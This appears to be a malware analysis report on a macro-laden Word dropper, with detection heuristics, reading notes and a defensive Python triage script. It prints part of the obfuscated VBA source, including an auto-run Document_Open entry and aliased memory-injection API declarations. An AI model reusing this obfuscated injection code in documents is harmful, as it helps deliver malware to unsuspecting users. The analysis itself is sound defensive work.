Verdict: MALICIOUS (Risk Score: 162)

Malware Insights

MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
The sample is a malicious Word document (OLE container) carrying VBA macros. A Document_Open procedure is present, so the macro code runs as soon as a user opens the document and enables macros. The extracted source declares Windows API functions behind dictionary-word aliases (CreateTimerQueueTimer, NtAllocateVirtualMemory, NtWriteVirtualMemory and CreateEventW among them) and invokes the NtWriteVirtualMemory alias from a helper function, a pattern consistent with staging a second-stage payload in process memory rather than spawning a visible shell. The shell/download tokens reported by the p-code heuristic do not appear in the truncated source preview and should be confirmed against the full extracted artifact. The ClamAV detection Doc.Dropper.Agent-6360759-0 corroborates the dropper classification.
Heuristics (5)

- ClamAV: Doc.Dropper.Agent-6360759-0 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Dropper.Agent-6360759-0
- VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS: Document contains VBA macro code
- Document_Open macro [high] OLE_VBA_DOCOPEN: Document_Open macro
- VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceRef# (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

All eight extracted URLs are XML namespace identifiers (Adobe XMP, RDF, Dublin Core, Photoshop and DrawingML) of the kind found in the metadata of embedded images and in drawing parts; none is reached from macro code. They are not network indicators and should not be used for blocking or hunting.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 45372 bytes | a28c9e12bf1cd0f0c531f892034308476238350b57828b7402208f204e79fb28 |

Preview (first 1,000 lines of the extracted script; the report truncates it partway through the remuda function):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub numStyle()
ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary) _
.PageNumbers.NumberStyle = wdPageNumberStyleLowercaseLetter
End Sub
Private Sub Document_Open()
Dim chichewa As Variant
Dim tallgrass As String
begrimed = "blasphemously"
bearable = "insculptured"
woland.barroom
hospes = 10 + 90
teucrium = 8520 + 7
unthreatened = 105260 + 4
Pmt 0, hospes, 27087, 31782, 7
End Sub
Attribute VB_Name = "blast"
#If (9 * 3 + 5) > (8 - 3 * 1) And (Win64) > (35 - 7 * 5) * 4 Then
Public Declare PtrSafe Function inflation Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (twirlingly As Any, ByVal crucis As Any, ByVal sophistication As Any, ByVal dreaming As Any, ByVal achromatous As Any, ByVal assembler As Any, ByVal attemptable As Any) As LongPtr
Public Declare PtrSafe Function dichotomization Lib "Shlwapi.dll " Alias _
"GetOverlappedResult" (ByVal aestival As Any, acquirable As Any, disa As Any, corgi As Any) As LongPtr
Public Declare PtrSafe Function doughface Lib "ntdll.dll" Alias _
"NtCreateEventPair" (humorsome As LongPtr, chromatogenous As LongPtr, ink As LongPtr) As LongPtr
Public Declare PtrSafe Function employe Lib "Kernel32.dll" Alias _
"CreateEventW" (ByVal nervy As LongPtr, revelling As LongPtr, tibetan As LongPtr, celluloid As LongPtr, domine As LongPtr) As Long
Public Declare PtrSafe Function utricle Lib "Shlwapi.dll " Alias _
"SleepConditionVariableSRW" (ByVal malaprop As Any, damage As Any, tranquillization As Any, associate As Any) As LongPtr
Public Declare PtrSafe Function zocle Lib "Ntdll.dll " Alias _
"NtAllocateVirtualMemory" (onesided As LongPtr, causation As LongPtr, ByVal misinformaton As LongPtr, dispassionByVal As LongPtr, astonished As LongPtr, ByVal loge As LongPtr) As LongPtr
Public Declare PtrSafe Function classman Lib "Ntdll.dll " Alias _
"AcquireSRWLockShared" (bearing As Any) As LongPtr
Public Declare PtrSafe Function vergent Lib "Ntdll.dll " Alias _
"NtWriteVirtualMemory" (ByVal dactyl As Any, ByVal geisha As Any, ByVal mormon As Any, ByVal bloodsucking As Any, ByVal asleep As Any) As LongPtr
Public Declare PtrSafe Function coastguard Lib "Shlwapi.dll" Alias _
"CreateFileWrapW" (amylolysis As LongPtr) As LongPtr
#End If
Public Function undebauched(manakin, avec, inflammable)
#If (7 * 4 + 5) > (7 - 2 * 1) And (35 - 7 * 5) * 4 < (Win64) Then
Dim asymptoptic As Byte
Dim voiced As Integer
Dim groundspeed As LongPtr
Dim abound As LongPtr
Dim bronchitic As LongPtr
Dim acervation As Byte
Dim anerythmon As LongPtr
Dim smitten As LongPtr
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (35 - 7 * 5) * 4 < (Win64) Then
Dim abound As Long
Dim omne As Long
Dim groundspeed As Long
Dim pericardial As Byte
Dim anerythmon As Long
Dim coactive As Long
Dim bronchitic As Long
Dim iodoprotein As String
Dim smitten As Long
Dim jurisdiction As Integer
Dim reproachfully As Integer
#End If
alopiidae = "misconjecture"
alopiidae = "eliminate"
abound = manakin
smitten = inflammable
cagliostro = Math.Round(424)
anerythmon = avec
commensurability = 23
vegetarian = 33824
neodarwinism = 361917
Pmt 0, commensurability, 34165, 31309, 5
dismal = Rnd(211)
groundspeed = 122 - 125 + 2
vergent ByVal groundspeed, abound, anerythmon, smitten, bronchitic
alopiidae = motheaten
End Function
Function remuda(nuptse)
Dim gauger As Variant
Dim plexiglas As Long
Dim conjure As Integer
Dim swing As Long
#If (6 * 3 + 5) > (7 - 2 * 1) And (48 - 6 * 8) * 2 < (Win64) Then
Dim lamende As Long
Dim aloneness As LongPtr
legend = 11 - 35 + 32
Dim conqueror As LongPtr
Dim unmodernized As Byte
Dim bestially As Variant
Dim bornagain As LongPtr
Dim radiochlorine As Integer
#End If
#If (8 * 2 + 5) > (7 - 2 * 1) And Not (35 - 7 * 5) * 4 < (Win64) Then
Dim aloneness A ... (truncated)
```

Reading notes. olevba has concatenated two modules: the ThisDocument class module, which holds Document_Open, and a standard module named blast. The #If conditions are constant arithmetic wrapped around the Win64 compiler constant: (35 - 7 * 5) * 4 evaluates to 0, so the Declare block is compiled only in 64-bit Office, and the paired #If blocks inside undebauched select LongPtr or Long variable types for the two bitnesses. The Declare statements hide real exports (CreateTimerQueueTimer, NtAllocateVirtualMemory, NtWriteVirtualMemory, CreateEventW, NtCreateEventPair) behind dictionary-word aliases; several pair an export with a library that does not provide it (GetOverlappedResult and SleepConditionVariableSRW are kernel32 exports, not Shlwapi, and AcquireSRWLockShared is kernel32, not ntdll), and some library strings carry a trailing space, reproduced verbatim above. The only API call in the visible portion is vergent, that is NtWriteVirtualMemory, inside undebauched; the woland.barroom call made from Document_Open, and the remainder of remuda, fall outside the preview. The junk assignments, Pmt and Rnd calls and unused Dim lines are filler intended to dilute string and token-based detection.
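The triage a practitioner wants on source like the preview above is to resolve the obfuscated aliases back to the exports they bind, find the auto-exec entry point, and check whether the declared exports form an allocate/write/execute chain. The script below is an added example, not code from this analyzer or from oletools; SAMPLE is a constructed excerpt modelled on the preview, and the AUTOEXEC and API_ROLES lists are the author's assumptions.

```python
"""Static triage of olevba-style VBA source: auto-exec entry points, Declare
statements with the real export behind each obfuscated local name, which
procedures call those exports, and whether the exports form an
allocate/write/execute chain (in-process shellcode injection).

Added example; not part of the analyzer. SAMPLE is a constructed excerpt
modelled on the report preview, and AUTOEXEC / API_ROLES are assumed lists.
"""
import re
from collections import defaultdict

# Auto-execution procedure names in Word and Excel (assumed list).
AUTOEXEC = {
    "Document_Open", "Document_Close", "Document_New", "AutoOpen", "AutoExec",
    "AutoClose", "AutoNew", "Workbook_Open", "Workbook_Close", "Auto_Open",
    "Auto_Close",
}

# Exports grouped by their role in an injection chain (assumed grouping).
API_ROLES = {
    "alloc": {"NtAllocateVirtualMemory", "VirtualAlloc", "VirtualAllocEx", "HeapCreate"},
    "write": {"NtWriteVirtualMemory", "WriteProcessMemory", "RtlMoveMemory", "RtlCopyMemory"},
    "exec": {"CreateThread", "CreateRemoteThread", "NtCreateThreadEx",
             "CreateTimerQueueTimer", "QueueUserAPC", "EnumSystemLocalesA"},
}

# Declare [PtrSafe] Function|Sub <local> Lib "<dll>" [Alias "<export>"],
# tolerating the `_` line continuation VBA allows before the Alias string.
DECLARE_RE = re.compile(
    r'Declare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)\s+Lib\s+"([^"]*)"'
    r'(?:\s+Alias\s+(?:_\s*)?"([^"]*)")?',
    re.IGNORECASE,
)
PROC_START_RE = re.compile(r"\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\s+(\w+)", re.IGNORECASE)
PROC_END_RE = re.compile(r"\s*End\s+(?:Sub|Function)\b", re.IGNORECASE)


def find_declares(src):
    """Map each local alias to (real export, library) for every Declare."""
    declares = {}
    for local, dll, export in DECLARE_RE.findall(src):
        declares[local] = (export or local, dll)
    return declares


def find_procedures(src):
    """Split the source into {procedure name: body}. Declare lines never match
    PROC_START_RE because `Declare` sits between Public and Function."""
    procs, name, body = {}, None, []
    for line in src.splitlines():
        start = PROC_START_RE.match(line)
        if name is None and start:
            name, body = start.group(1), []
        elif name is not None and PROC_END_RE.match(line):
            procs[name], name = "\n".join(body), None
        elif name is not None:
            body.append(line)
    return procs


def triage(src):
    declares = find_declares(src)
    procs = find_procedures(src)
    # Resolve obfuscated call sites back to the export they actually invoke.
    calls = defaultdict(set)
    for proc, body in procs.items():
        for local, (export, _dll) in declares.items():
            if re.search(r"\b%s\b" % re.escape(local), body):
                calls[proc].add(export)
    exports = {export for export, _dll in declares.values()}
    roles = {role: sorted(exports & apis) for role, apis in API_ROLES.items()}
    chain = all(roles.values())
    autoexec = sorted(p for p in procs if p in AUTOEXEC)
    return {
        "autoexec": autoexec,
        "declares": declares,
        "calls": {p: sorted(e) for p, e in calls.items()},
        "roles": roles,
        "injection_chain": chain,
        # Library strings with trailing whitespace, kept verbatim: an exact
        # "Ntdll.dll" string match would miss these declarations.
        "padded_libs": sorted({dll for _e, dll in declares.values() if dll != dll.strip()}),
        "verdict": ("auto-exec entry point plus alloc/write/exec API declarations"
                    if autoexec and chain else "no complete injection chain"),
    }


# Constructed excerpt modelled on the report preview (not the full artifact).
SAMPLE = '''Attribute VB_Name = "ThisDocument"
Private Sub Document_Open()
Dim chichewa As Variant
begrimed = "blasphemously"
woland.barroom
hospes = 10 + 90
Pmt 0, hospes, 27087, 31782, 7
End Sub
Attribute VB_Name = "blast"
#If (9 * 3 + 5) > (8 - 3 * 1) And (Win64) > (35 - 7 * 5) * 4 Then
Public Declare PtrSafe Function inflation Lib "Kernel32" Alias _
"CreateTimerQueueTimer" (twirlingly As Any, ByVal crucis As Any) As LongPtr
Public Declare PtrSafe Function dichotomization Lib "Shlwapi.dll " Alias _
"GetOverlappedResult" (ByVal aestival As Any, acquirable As Any) As LongPtr
Public Declare PtrSafe Function zocle Lib "Ntdll.dll " Alias _
"NtAllocateVirtualMemory" (onesided As LongPtr, causation As LongPtr) As LongPtr
Public Declare PtrSafe Function vergent Lib "Ntdll.dll " Alias _
"NtWriteVirtualMemory" (ByVal dactyl As Any, ByVal geisha As Any) As LongPtr
#End If
Public Function undebauched(manakin, avec, inflammable)
Dim groundspeed As LongPtr
abound = manakin
groundspeed = 122 - 125 + 2
vergent ByVal groundspeed, abound, anerythmon, smitten, bronchitic
End Function
'''

if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE), indent=2))
```

Run it against the real macros.bas (olevba -c or the artifact above) instead of SAMPLE to see every alias resolved; on the preview it reports Document_Open as the entry point, NtWriteVirtualMemory as the only export called from visible code, and a complete alloc/write/exec set among the declarations. Calls that go through another module (woland.barroom here) are not resolved, which is exactly why the p-code heuristic on this page is still needed when source extraction is partial.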